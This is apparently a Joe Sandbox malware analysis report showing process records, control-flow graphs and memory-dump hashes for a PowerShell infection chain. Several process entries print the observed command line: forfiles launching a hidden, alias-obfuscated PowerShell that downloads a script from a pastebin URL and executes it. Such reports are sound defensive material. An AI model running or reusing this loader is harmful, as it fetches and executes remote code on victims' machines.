                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:25
                                                            Start time:10:00:30
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\forfiles.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                            Imagebase:0x7ff634000000
                                                            File size:52'224 bytes
                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:26
                                                            Start time:10:00:30
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:10:00:30
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:28
                                                            Start time:10:00:30
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:2.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              execution_graph 10447 7ffd34779fd4 10448 7ffd34779fdd LoadLibraryExW 10447->10448 10450 7ffd3477a08d 10448->10450

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 97 7ffd3476ee86-7ffd3476ee93 98 7ffd3476ee9e-7ffd3476ef67 97->98 99 7ffd3476ee95-7ffd3476ee9d 97->99 102 7ffd3476efd3 98->102 103 7ffd3476ef69-7ffd3476ef72 98->103 99->98 104 7ffd3476efd5-7ffd3476effa 102->104 103->102 105 7ffd3476ef74-7ffd3476ef80 103->105 112 7ffd3476effc-7ffd3476f005 104->112 113 7ffd3476f066 104->113 106 7ffd3476ef82-7ffd3476ef94 105->106 107 7ffd3476efb9-7ffd3476efd1 105->107 108 7ffd3476ef98-7ffd3476efab 106->108 109 7ffd3476ef96 106->109 107->104 108->108 111 7ffd3476efad-7ffd3476efb5 108->111 109->108 111->107 112->113 115 7ffd3476f007-7ffd3476f013 112->115 114 7ffd3476f068-7ffd3476f110 113->114 126 7ffd3476f112-7ffd3476f11c 114->126 127 7ffd3476f17e 114->127 116 7ffd3476f04c-7ffd3476f064 115->116 117 7ffd3476f015-7ffd3476f027 115->117 116->114 119 7ffd3476f02b-7ffd3476f03e 117->119 120 7ffd3476f029 117->120 119->119 122 7ffd3476f040-7ffd3476f048 119->122 120->119 122->116 126->127 129 7ffd3476f11e-7ffd3476f12b 126->129 128 7ffd3476f180-7ffd3476f1a9 127->128 135 7ffd3476f213 128->135 136 7ffd3476f1ab-7ffd3476f1b6 128->136 130 7ffd3476f164-7ffd3476f17c 129->130 131 7ffd3476f12d-7ffd3476f13f 129->131 130->128 133 7ffd3476f143-7ffd3476f156 131->133 134 7ffd3476f141 131->134 133->133 137 7ffd3476f158-7ffd3476f160 133->137 134->133 139 7ffd3476f215-7ffd3476f2bb 135->139 136->135 138 7ffd3476f1b8-7ffd3476f1c6 136->138 137->130 140 7ffd3476f1ff-7ffd3476f211 138->140 141 7ffd3476f1c8-7ffd3476f1da 138->141 148 7ffd3476f2c3-7ffd3476f2fd call 7ffd3476f344 139->148 149 7ffd3476f2bd 139->149 140->139 142 7ffd3476f1de-7ffd3476f1f1 141->142 143 7ffd3476f1dc 141->143 142->142 145 7ffd3476f1f3-7ffd3476f1fb 142->145 143->142 145->140 155 7ffd3476f302-7ffd3476f328 148->155 149->148 156 7ffd3476f32f-7ffd3476f343 155->156 157 7ffd3476f32a 155->157 157->156
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e65bdfe468c92c84df6f028ffb14d28cd1ab97fc9d81405bae5c2d5db129da33
                                                              • Instruction ID: 3587fce7e7cb46aecfb54cbef391047db13b55b493ae911c7c0842223fc40cb1
                                                              • Opcode Fuzzy Hash: e65bdfe468c92c84df6f028ffb14d28cd1ab97fc9d81405bae5c2d5db129da33
                                                              • Instruction Fuzzy Hash: 56F1A770A08A8D8FEBA8DF28C8557E977D2FF55310F04426EE84DC7295DF38A9458B81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 158 7ffd3476fc32-7ffd3476fc3f 159 7ffd3476fc41-7ffd3476fc49 158->159 160 7ffd3476fc4a-7ffd3476fd17 158->160 159->160 164 7ffd3476fd83 160->164 165 7ffd3476fd19-7ffd3476fd22 160->165 166 7ffd3476fd85-7ffd3476fdaa 164->166 165->164 167 7ffd3476fd24-7ffd3476fd30 165->167 174 7ffd3476fdac-7ffd3476fdb5 166->174 175 7ffd3476fe16 166->175 168 7ffd3476fd32-7ffd3476fd44 167->168 169 7ffd3476fd69-7ffd3476fd81 167->169 170 7ffd3476fd48-7ffd3476fd5b 168->170 171 7ffd3476fd46 168->171 169->166 170->170 173 7ffd3476fd5d-7ffd3476fd65 170->173 171->170 173->169 174->175 177 7ffd3476fdb7-7ffd3476fdc3 174->177 176 7ffd3476fe18-7ffd3476fe3d 175->176 183 7ffd3476fe3f-7ffd3476fe49 176->183 184 7ffd3476feab 176->184 178 7ffd3476fdfc-7ffd3476fe14 177->178 179 7ffd3476fdc5-7ffd3476fdd7 177->179 178->176 181 7ffd3476fddb-7ffd3476fdee 179->181 182 7ffd3476fdd9 179->182 181->181 185 7ffd3476fdf0-7ffd3476fdf8 181->185 182->181 183->184 186 7ffd3476fe4b-7ffd3476fe58 183->186 187 7ffd3476fead-7ffd3476fedb 184->187 185->178 188 7ffd3476fe91-7ffd3476fea9 186->188 189 7ffd3476fe5a-7ffd3476fe6c 186->189 194 7ffd3476fedd-7ffd3476fee8 187->194 195 7ffd3476ff4b 187->195 188->187 190 7ffd3476fe70-7ffd3476fe83 189->190 191 7ffd3476fe6e 189->191 190->190 193 7ffd3476fe85-7ffd3476fe8d 190->193 191->190 193->188 194->195 197 7ffd3476feea-7ffd3476fef8 194->197 196 7ffd3476ff4d-7ffd3477003a 195->196 208 7ffd34770042-7ffd3477005c 196->208 209 7ffd3477003c 196->209 198 7ffd3476ff31-7ffd3476ff49 197->198 199 7ffd3476fefa-7ffd3476ff0c 197->199 198->196 200 7ffd3476ff10-7ffd3476ff23 199->200 201 7ffd3476ff0e 199->201 200->200 203 7ffd3476ff25-7ffd3476ff2d 200->203 201->200 203->198 212 7ffd34770065-7ffd347700a4 call 7ffd347700c0 208->212 209->208 216 7ffd347700ab-7ffd347700bf 212->216 217 7ffd347700a6 212->217 217->216
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d30ed40c7075898d58290a330ce1cf08c917f95345d766aadf26d8d84bbc5e77
                                                              • Instruction ID: fb77cd24bb0fc6d90c065795306314fb270a8d7919287ea22579131145f01e63
                                                              • Opcode Fuzzy Hash: d30ed40c7075898d58290a330ce1cf08c917f95345d766aadf26d8d84bbc5e77
                                                              • Instruction Fuzzy Hash: 41E1A470A08A4E8FEBA8DF28C8657E977D2FF55310F14426ED84DC7291CB78A84587C1

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b5322a106664a8cb4c7399e968bc8fc9efba87a53448b9a2780f6d153238173
                                                              • Instruction ID: f0842330c5e7296580fb1a2cc94c9717b18f71dbfcfc920925afe263e3201a3a
                                                              • Opcode Fuzzy Hash: 1b5322a106664a8cb4c7399e968bc8fc9efba87a53448b9a2780f6d153238173
                                                              • Instruction Fuzzy Hash: 349185C3A0F6C25BF761866C1C65135BF91EF9726078840FBD6848B1D7A84CBD199BC2

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: a0a41f7dc6441ba2771bf7b8d35e4d3873c17882ca89e7aaaca41cfa8e42d6b4
                                                              • Instruction ID: 2937997b53badb6a6b32d4cf29437fdcf58726bec83c20d60b1a9e25055d5963
                                                              • Opcode Fuzzy Hash: a0a41f7dc6441ba2771bf7b8d35e4d3873c17882ca89e7aaaca41cfa8e42d6b4
                                                              • Instruction Fuzzy Hash: 9731E131A0CA4C8FDB19DBA88849AE9BBE0EF56321F04822FD009D3152DB74A416CB91

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3099583882.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34830000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9080ad41d1c4200a375b301ccd888a9814432de5c41a1c8748c86b6cbaf0ded8
                                                              • Instruction ID: 7f0dd567ecd9a7946e6b24797eaf59ca9ecd63e384fdb980e40c66448d78927b
                                                              • Opcode Fuzzy Hash: 9080ad41d1c4200a375b301ccd888a9814432de5c41a1c8748c86b6cbaf0ded8
                                                              • Instruction Fuzzy Hash: 2141E732B0CA494FEB94DB5C94A5AF9B7E1FF59310B14017FD54ED3292DA29E802C740

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 414 7ffd34833b95-7ffd34833b97 415 7ffd34833be9 414->415 416 7ffd34833b99-7ffd34833b9e 414->416 417 7ffd34833bf0-7ffd34833c05 415->417 418 7ffd34833ba0-7ffd34833bb2 416->418 419 7ffd34833bc9 416->419 424 7ffd34833c07-7ffd34833c36 417->424 426 7ffd34833bb4 418->426 427 7ffd34833bb6-7ffd34833bc7 418->427 420 7ffd34833bcb-7ffd34833bcd 419->420 422 7ffd34833c50-7ffd34833c5a 420->422 423 7ffd34833bd3-7ffd34833bdb 420->423 428 7ffd34833c5c-7ffd34833c68 422->428 429 7ffd34833c69-7ffd34833ca9 422->429 430 7ffd34833bdd-7ffd34833be7 423->430 431 7ffd34833beb 423->431 438 7ffd34833c3d-7ffd34833c4f 424->438 426->427 427->420 430->415 430->424 431->417
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3099583882.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34830000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a14a2eecdd61aa0494f0e6b2f437e7a69a34410d2fcf2ac904a0df7b2b274fad
                                                              • Instruction ID: 083150fdaaee9441322cb91ca80b529338d2e61037d369755c088a3f380a6365
                                                              • Opcode Fuzzy Hash: a14a2eecdd61aa0494f0e6b2f437e7a69a34410d2fcf2ac904a0df7b2b274fad
                                                              • Instruction Fuzzy Hash: 5241D232B0D94A4FEBA5EB5C94B16B8B7D1EF59310F1801BBD14EC7293DE1DA8429381
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: O_^$O_^$O_^$O_^$O_^
                                                              • API String ID: 0-2660881393
                                                              • Opcode ID: 13a4ab43628fa1340e5a692a187f73b9a22f943e2739d710a97401f8e9b4cd92
                                                              • Instruction ID: 9865886cfce2f9e65c1211122b6ca4b7212475330b0389293394b3e444863e7c
                                                              • Opcode Fuzzy Hash: 13a4ab43628fa1340e5a692a187f73b9a22f943e2739d710a97401f8e9b4cd92
                                                              • Instruction Fuzzy Hash: 16416A97E0F6C29FE762462448B50A53FD6AF5323470B01F2C698DF193AE5C7807A692
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: O_^$O_^$O_^$O_^$O_^
                                                              • API String ID: 0-2660881393
                                                              • Opcode ID: 9a025792913ff98d285c7f9ca4bc68a54c89254ce9ac5278f524f86dcf087091
                                                              • Instruction ID: 49e855d9bd00afd1c7476a1a909d78caf4460a9fa28804b7ff89e38eed268a2b
                                                              • Opcode Fuzzy Hash: 9a025792913ff98d285c7f9ca4bc68a54c89254ce9ac5278f524f86dcf087091
                                                              • Instruction Fuzzy Hash: C731A8D7E0FAC79BE362452808B50953BC6AF6337470B11B2C65CDB193AE4C38036282
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 3880cffdd576601c80e5f160c1e36d1250379592d0a82463f5a525fc0da5e91b
                                                              • Instruction ID: 56cfa02b60c7d726c5d3d68e2f6b59ddc4b8c8410db59498da188e0df4cbee68
                                                              • Opcode Fuzzy Hash: 3880cffdd576601c80e5f160c1e36d1250379592d0a82463f5a525fc0da5e91b
                                                              • Instruction Fuzzy Hash: D2316787B0EBC29AF763412958BA1E93FD5DF9317170D11B7CAC5C6097AD0C284BA391
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 2950ce6ccc67f0a60a4e38f2344dfff72338abbfb1c6f1db77ff5753226f5061
                                                              • Instruction ID: 342d5121047c619a8f9143ab6cfbabcdaafcaa15842735e11d7af27a9f7c6a76
                                                              • Opcode Fuzzy Hash: 2950ce6ccc67f0a60a4e38f2344dfff72338abbfb1c6f1db77ff5753226f5061
                                                              • Instruction Fuzzy Hash: 413143C7B0EBC29AF763422918AA0E53FD5DF9317174D00B7CAC5C6097AD0D284AA392
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0acb75c55ae3226056c3ee181d51c56c0bbac33292078b2c2366df5bd3db61d0
                                                              • Instruction ID: 5feec1e663e025c77bee8caf8a9f72ffd6412e57a08e1b575745b2fc76068a07
                                                              • Opcode Fuzzy Hash: 0acb75c55ae3226056c3ee181d51c56c0bbac33292078b2c2366df5bd3db61d0
                                                              • Instruction Fuzzy Hash: 9312C3C3A0F6C25FF751822C1C691797FD1AF5325478980FBD6848B0DBA85CBD099782
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 435e597739f09f25d0b9c3fb362b7b3f8d8ab9699ad753c205b9f1f605b31c42
                                                              • Instruction ID: 77c3966082c24372d34315a455eff1391dab87690db2560dfea20e0c6bfeb964
                                                              • Opcode Fuzzy Hash: 435e597739f09f25d0b9c3fb362b7b3f8d8ab9699ad753c205b9f1f605b31c42
                                                              • Instruction Fuzzy Hash: 3112B283B0EAC24BF752862C1C69139BF91EB5325479844FBD694D70DBA84EBD0993C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 626b75f82a7d8cf191272b68d78cb210cb7badb91c8de56c7b21d5ab1a6c14bd
                                                              • Instruction ID: 2b6bfe7741196623dc008fefcfa5cad76245b4f81358c416241e19e3b2456e20
                                                              • Opcode Fuzzy Hash: 626b75f82a7d8cf191272b68d78cb210cb7badb91c8de56c7b21d5ab1a6c14bd
                                                              • Instruction Fuzzy Hash: 7EE1E8C3A0E6C29FE71146289C69139BF90AF5326074D45FBD694C70DB948CBD1A93C3
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a88ca30de6bfbee3419487125e38335e37517f48a5a7ccee1d84e29ac60833db
                                                              • Instruction ID: 6a08197fdba5e4b4ed7b4870dc8ea51bb6896be324840eb8e0e3b2fcc9cd2d5f
                                                              • Opcode Fuzzy Hash: a88ca30de6bfbee3419487125e38335e37517f48a5a7ccee1d84e29ac60833db
                                                              • Instruction Fuzzy Hash: 29C1F56670D6C19FE352A66D98B51E53FA1DFD323570808BBC684C61A3ED0D684BC3E2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 990de0f4d675e827577d1f41f86a1d2f882199e3c1e0f1e05e3e67e7b53fcfc9
                                                              • Instruction ID: 2d6beb86b31cd9f830ad31ecf83bb8613dd083ca38c15909e9c4f57b95569be2
                                                              • Opcode Fuzzy Hash: 990de0f4d675e827577d1f41f86a1d2f882199e3c1e0f1e05e3e67e7b53fcfc9
                                                              • Instruction Fuzzy Hash: E9D1F9C2A0E6C25BFB5186780C6A2797FA1EF53254B4840FBD294870DBD84EBD0D97C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5acee243265d7709578d810722cbbf4bcc36a7d6cda9f3378993eb010a150c80
                                                              • Instruction ID: b427928037ab10c4692c38ec8ead044c68157250d9f60b8a27bf3968edb4d206
                                                              • Opcode Fuzzy Hash: 5acee243265d7709578d810722cbbf4bcc36a7d6cda9f3378993eb010a150c80
                                                              • Instruction Fuzzy Hash: BAC13CC3B0E6C25BF711866C6C661B97F91EF4326578841FBD284CB0D7A84DB81A93C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b52c36002c45481afa8a69d41f34454141ed2ebbc0c17568b82c0993c0b4d5b
                                                              • Instruction ID: a4f60ccd1ac4e6e4a9038bd578dcf7a110122b1df65ab581601ea9a9e033a17a
                                                              • Opcode Fuzzy Hash: 9b52c36002c45481afa8a69d41f34454141ed2ebbc0c17568b82c0993c0b4d5b
                                                              • Instruction Fuzzy Hash: 84A10A83B0E6C25FF762826C5C661797F91EF4326578940FBD684CB0D7A84DB81993C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08ef97dec022019d54ffa4418e021afc68fe92a6d40764fa312e7af4f43a4fc9
                                                              • Instruction ID: d26dae440cc41c1edcf16cc38fa93d61013c953dd2ad93f00fe8a9b74620b62b
                                                              • Opcode Fuzzy Hash: 08ef97dec022019d54ffa4418e021afc68fe92a6d40764fa312e7af4f43a4fc9
                                                              • Instruction Fuzzy Hash: D571A497A0E9926BD32167BC78B30EA3B94DF4323D70D41B7D1C88D053AD0C285A9696
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0316be607b2cd29f0b1e8ed3a74f7717952556f1db719a605ddff6492efe510b
                                                              • Instruction ID: fa21b718ec235dc508b7b2fd4352f82347af854edd1a302c006f6c44330855f4
                                                              • Opcode Fuzzy Hash: 0316be607b2cd29f0b1e8ed3a74f7717952556f1db719a605ddff6492efe510b
                                                              • Instruction Fuzzy Hash: 8B718696A0D7E3DBE7528A2848FA0E57FE1EF5332471900BAC585C7093DA1D3816A691
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 292ccc40c346ab3c3705e78caea7335e708f79b36418ec6fd432567a0d7e243a
                                                              • Instruction ID: 3c48e3ab7fc0cf0db026510e51b8e768fe8259c3b1231640d8e1e0594b94990a
                                                              • Opcode Fuzzy Hash: 292ccc40c346ab3c3705e78caea7335e708f79b36418ec6fd432567a0d7e243a
                                                              • Instruction Fuzzy Hash: 50619787B0E6D297E322563C64F60EA7F95DF5323574941B7C6C4C90A7ED0C384BA2A1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1bd45a9ca38a7fef1640c455ce7bf0285e7ae7dcab6f7c93e417e6943564066
                                                              • Instruction ID: af90d41d252fd43d973c77d7cb7217a54c908b61541125666f284611695b9acd
                                                              • Opcode Fuzzy Hash: f1bd45a9ca38a7fef1640c455ce7bf0285e7ae7dcab6f7c93e417e6943564066
                                                              • Instruction Fuzzy Hash: 8061D3C3A0F6C25BF651826C1CA9135AFE1AF5325479881FBD684DB0CBE84DBD0997C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f60d0a811881bff837a501735b8fdd4e55e3c09a57fd6255f3c0632a79324028
                                                              • Instruction ID: 61153e87028e2b36151a6236a32918380d70a002b5fee9e7fd3ff895d7b29921
                                                              • Opcode Fuzzy Hash: f60d0a811881bff837a501735b8fdd4e55e3c09a57fd6255f3c0632a79324028
                                                              • Instruction Fuzzy Hash: F5514D92A0D7D75EE7A256385CB50D93FA59F6323470A00F7CAC8CF097DE0C280AA252
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d30fc2fc1347d5251df2e5d0acc70783f8a2704ced7a217d262458b63722435e
                                                              • Instruction ID: 42f62b62dcf6578cdb1a63789ee0e79c0a4a23ecc26cfec2241ab37a04210c1a
                                                              • Opcode Fuzzy Hash: d30fc2fc1347d5251df2e5d0acc70783f8a2704ced7a217d262458b63722435e
                                                              • Instruction Fuzzy Hash: D141B5D2B0D7C39EE312962C68B60EA7F95DF83234B4940F7C5C9CA093DC1D6846D661
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c31c16333f7121d8cd7cecc8623bf93505b1e39464953f9abcb20b2b35fa39f3
                                                              • Instruction ID: f299a63065ca02eca9d2906e2967c5dbe528b835042e3a19be860a3f7967a1f5
                                                              • Opcode Fuzzy Hash: c31c16333f7121d8cd7cecc8623bf93505b1e39464953f9abcb20b2b35fa39f3
                                                              • Instruction Fuzzy Hash: 66419E8BB4E6D25AE652512D68FA0D93F94DFD32B570910F7C785C70D3AC0E2C4BA2A1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
